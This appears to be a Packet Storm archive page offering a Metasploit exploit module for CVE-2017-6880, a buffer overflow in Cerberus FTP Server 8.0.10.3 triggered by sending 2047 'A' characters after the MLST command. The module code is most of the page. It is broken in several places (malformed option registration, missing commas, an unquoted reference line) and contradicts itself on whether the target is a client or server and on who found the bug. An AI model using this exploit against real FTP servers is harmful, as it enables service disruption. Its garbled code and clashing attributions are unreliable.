what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Cerberus FTP 8.0.10.3 MLST Buffer Overflow

Cerberus FTP 8.0.10.3 MLST Buffer Overflow
Posted May 15, 2017
Authored by Souhardya Sardar | Site metasploit.com

This Metasploit module exploits a buffer overflow in the Cerberus FTP client version 8.0.10.3 that is triggered by sending a bad char "A" in the command "MLST".

tags | exploit, overflow
advisories | CVE-2017-6880
SHA-256 | f6b505ea1428a3f5f93df139b72623113999eac71ef627594621b4e58ddbd048

Cerberus FTP 8.0.10.3 MLST Buffer Overflow

Change Mirror Download
#!/usr/share/ruby

#[+] Title: Cerberus FTP Server 8.0.10.3 a 'MLST' Remote Buffer Overflow
#[+] Credits / Discovery: Nassim Asrir
#[+] Author Contact: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/
#[+] Metasploit Module Author : Souhardya Sardar
#[+] Metasploit Module Author Contact: github.com/Souhardya | Souhardya.sardar@protonmail.com
#[+] Author Company: Henceforth
#[+] CVE: CVE-2017-6880

#Vendor:
#===============
#
#https://www.cerberusftp.com/


#Download:
#===========
#
#https://www.cerberusftp.com/files/CerberusInstall.exe (32-Bit)


#Vulnerability Type:
#===================
#
#Remote Buffer Overflow.



# ----------------------------
# Module Dependencies/requires
# ----------------------------

require 'msf/core'

# ----------------------------------
# Metasploit Class name and includes
# ----------------------------------

class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::Ftp

# -----------------------------------------
# Initialize information
# -----------------------------------------

def initialize(info = {})
super(update_info(info,
'Name' => 'Cerber FTP Remote Buffer Overflow ',
'Description' => %q{
This module exploits a buffer overflow in the Cerber FTP client that is triggered
by sending a bad char "A" in the command "MLST" (2047) .
},

'Author' =>
[
'Module Author And Bug Discovered by : Peter Baris',
'Coded by : Souhardya Sardar (github.com/Souhardya)', #metasploit module :)
'Thanks to : Nidhish Pandya ', #auditing:)


],
'License' => NONE,
'Platform' => ['win']

'References' =>
[
[ 'CVE', 'CVE-2017-6880' ],
[ Reference code taken from original POC located here :- https://www.exploit-db.com/exploits/41620/ ]

]))

register_optionsOptPort.new('SRVPORT', [true, "The remote FTP server port", 21])
], self.class)
deregister_options('FTPUSER', 'FTPPASS')
end

def exploit
connect

payload = "A"*2047

print_status("Trying to connect to target server {target.name...")


sock.put('MLST ' + payload + '\r\n')

handler
disconnect
end

end
Login or Register to add favorites

File Archive:

August 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Aug 1st
    15 Files
  • 2
    Aug 2nd
    22 Files
  • 3
    Aug 3rd
    0 Files
  • 4
    Aug 4th
    0 Files
  • 5
    Aug 5th
    0 Files
  • 6
    Aug 6th
    0 Files
  • 7
    Aug 7th
    0 Files
  • 8
    Aug 8th
    0 Files
  • 9
    Aug 9th
    0 Files
  • 10
    Aug 10th
    0 Files
  • 11
    Aug 11th
    0 Files
  • 12
    Aug 12th
    0 Files
  • 13
    Aug 13th
    0 Files
  • 14
    Aug 14th
    0 Files
  • 15
    Aug 15th
    0 Files
  • 16
    Aug 16th
    0 Files
  • 17
    Aug 17th
    0 Files
  • 18
    Aug 18th
    0 Files
  • 19
    Aug 19th
    0 Files
  • 20
    Aug 20th
    0 Files
  • 21
    Aug 21st
    0 Files
  • 22
    Aug 22nd
    0 Files
  • 23
    Aug 23rd
    0 Files
  • 24
    Aug 24th
    0 Files
  • 25
    Aug 25th
    0 Files
  • 26
    Aug 26th
    0 Files
  • 27
    Aug 27th
    0 Files
  • 28
    Aug 28th
    0 Files
  • 29
    Aug 29th
    0 Files
  • 30
    Aug 30th
    0 Files
  • 31
    Aug 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close